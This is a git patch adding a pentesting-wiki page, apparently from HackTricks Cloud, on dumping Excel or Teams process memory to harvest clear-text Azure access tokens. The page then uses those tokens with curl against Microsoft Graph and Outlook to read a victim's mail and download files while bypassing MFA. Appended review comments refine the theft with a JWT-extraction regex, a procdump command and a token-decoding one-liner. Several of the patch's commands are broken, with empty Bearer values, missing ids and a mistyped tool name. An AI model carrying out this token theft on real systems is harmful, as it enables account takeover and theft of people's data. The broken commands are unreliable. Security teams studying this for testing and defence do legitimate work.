From e15f924219ec8b6001c9605a2c44df0644ed9ac6 Mon Sep 17 00:00:00 2001 From: CPol Date: Sat, 20 Jul 2024 16:35:26 +0000 Subject: [PATCH] GITBOOK-647: No subject --- SUMMARY.md | 1 + .../README.md | 2 +- .../az-processes-memory-access-token.md | 65 +++++++++++++++++++ 3 files changed, 67 insertions(+), 1 deletion(-) create mode 100644 pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md diff --git a/SUMMARY.md b/SUMMARY.md index 6ac8b7f850..e1798f8cfc 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -409,6 +409,7 @@ * [Az - Pass the Certificate](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md) * [Az - Pass the PRT](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md) * [Az - Phishing Primary Refresh Token (Microsoft Entra)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md) + * [Az - Processes Memory Access Token](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md) * [Az - Primary Refresh Token (PRT)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md) * [Az - Persistence](pentesting-cloud/azure-security/az-persistence.md) * [Az - Device Registration](pentesting-cloud/azure-security/az-device-registration.md) diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md index 98d6bc7c3c..b141b1583d 100644 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md +++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md 
@@ -57,7 +57,7 @@ The most interesting type of token is the Primary Refresh Token (PRT). From the **compromised machine to the cloud**: * [**Pass the Cookie**](az-pass-the-cookie.md): Steal Azure cookies from the browser and use them to login -* **Dump processes access tokens**: As explained in [**this video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), some Microsoft software synchronized with the cloud (Excel, Teams...) might store access tokens in clear-text in memory. So just dumping the memory of the process and grepping for JWT tokens might grant you access over several resources of the victim in the cloud bypassing MFA. +* [**Dump processes access tokens**](az-processes-memory-access-token.md): Dump the memory of local processes synchronized with the cloud (like excel, Teams...) and find access tokens in clear text. * [**Phishing Primary Refresh Token**](az-phishing-primary-refresh-token-microsoft-entra.md)**:** Phish the PRT to abuse it * [**Pass the PRT**](pass-the-prt.md): Steal the device PRT to access Azure impersonating it. * [**Pass the Certificate**](az-pass-the-certificate.md)**:** Generate a cert based on the PRT to login from one machine to another diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md new file mode 100644 index 0000000000..c8373f6e14 --- /dev/null +++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md @@ -0,0 +1,65 @@ +# Az - Processes Memory Access Token + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## **Basic Information** + +As explained in [**this video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), some Microsoft software synchronized with the cloud (Excel, Teams...) might **store access tokens in clear-text in memory**. So just **dumping** the **memory** of the process and **grepping for JWT tokens** might grant you access over several resources of the victim in the cloud bypassing MFA. + +Steps: + +1. Dump the excel processes syncronized with in EntraID user with your favourite tool. +2. Run: `string excel.dmp | grep 'eyJ0'` and find several tokens in the output +3. Find the tokens that interest you the most and run tools over them: + +{% code overflow="wrap" %} +```bash +# Check the identity of the token +curl -s -H "Authorization: Bearer " https://graph.microsoft.com/v1.0/me | jq + +# Check the email (you need a token authorized in login.microsoftonline.com) +curl -s -H "Authorization: Bearer " https://outlook.office.com/api/v2.0/me/messages | jq + +# Download a file from Teams +## You need a token that can access graph.microsoft.com +## Then, find the inside the memory and call +curl -s -H "Authorization: Bearer " https://graph.microsoft.com/v1.0/sites//drives | jq + +## Then, list one drive +curl -s -H "Authorization: Bearer " 'https://graph.microsoft.com/v1.0/sites//drives/' | jq + +## Finally, download a file from that drive: +┌──(magichk㉿black-pearl)-[~] +└─$ curl -o -L -H "Authorization: Bearer " '<@microsoft.graph.downloadUrl>' +``` +{% endcode %} + +**Note that these kind of access tokens can be also found inside other processes.** + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %}
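Review bot: in the SUMMARY.md hunk the new entry "Az - Processes Memory Access Token" is inserted between "Az - Phishing Primary Refresh Token" and "Az - Primary Refresh Token (PRT)", but the neighbouring entries are kept in alphabetical order and "Primary" sorts before "Processes"; move the added line one position down, after the "Az - Primary Refresh Token (PRT)" entry, so the sub-list stays sorted.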
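Review bot: in the README.md hunk the rewritten bullet lowercases the product name ("like excel, Teams...") and drops the one clause that states why the technique matters, the MFA bypass, which the old bullet had and which readers skimming this list will not see unless they open the page; suggest `* [**Dump processes access tokens**](az-processes-memory-access-token.md): Dump the memory of local processes synchronized with the cloud (like Excel, Teams...) and find clear-text access tokens that grant access to the victim's cloud resources without MFA.`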
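Review bot: in the new az-processes-memory-access-token.md, step 2 runs `string excel.dmp | grep 'eyJ0'`, which invokes a command that does not exist (the binutils tool is `strings`), and `eyJ0` only matches headers that start with `{"typ"`, so tokens whose header starts with `{"alg"` (prefix `eyJh`) are missed; suggest `strings -n 20 excel.dmp | grep -oE 'eyJ[A-Za-z0-9_-]+\.eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+' | sort -u`, which matches the full three-part JWT shape and dedupes the many copies a process keeps. Every `curl` line in the code block is missing its value after `Bearer `, and the site id, drive id, `-o` output file and the "find the inside the memory" sentence are likewise empty (`sites//drives`), almost certainly because angle-bracket placeholders were swallowed as HTML by the GitBook export; escape them (for example `Bearer \<access_token\>`) or use a non-HTML placeholder style so the commands survive rendering and are copy-pasteable, and for the same reason drop the `┌──(magichk㉿black-pearl)-[~]` / `└─$` prompt from the last command. Step 1 reads "Dump the excel processes syncronized with in EntraID user with your favourite tool"; suggest "Dump the memory of the Excel process running as the Entra ID user, e.g. Sysinternals `procdump -ma excel.exe excel.dmp` or Task Manager's Create dump file". Step 3 tells the reader to pick "the tokens that interest you the most" but gives no way to triage them: a token is only accepted by the resource named in its `aud` claim, which is what the outlook.office.com comment is trying to say (the audience must be outlook.office.com; "authorized in login.microsoftonline.com" is not the condition), and access tokens are short-lived, so suggest decoding the middle segment before spending a request, e.g. `python3 -c 'import sys,base64,json;p=sys.argv[1].split(".")[1];print(json.dumps(json.loads(base64.urlsafe_b64decode(p+"="*(-len(p)%4))),indent=1))' "$TOKEN"`, and checking `aud`, `scp`, `upn` and `exp`. The Outlook REST `api/v2.0` endpoint is deprecated by Microsoft in favour of Graph; `https://graph.microsoft.com/v1.0/me/messages` returns the mailbox with the same Graph-audience token already used for `/me`, which removes the need for a second token. Finally, "these kind of access tokens" should read "these kinds of access tokens".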